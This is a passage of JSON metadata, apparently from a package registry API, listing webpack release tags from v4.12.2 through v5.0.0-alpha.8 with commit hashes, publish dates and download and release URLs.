b/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack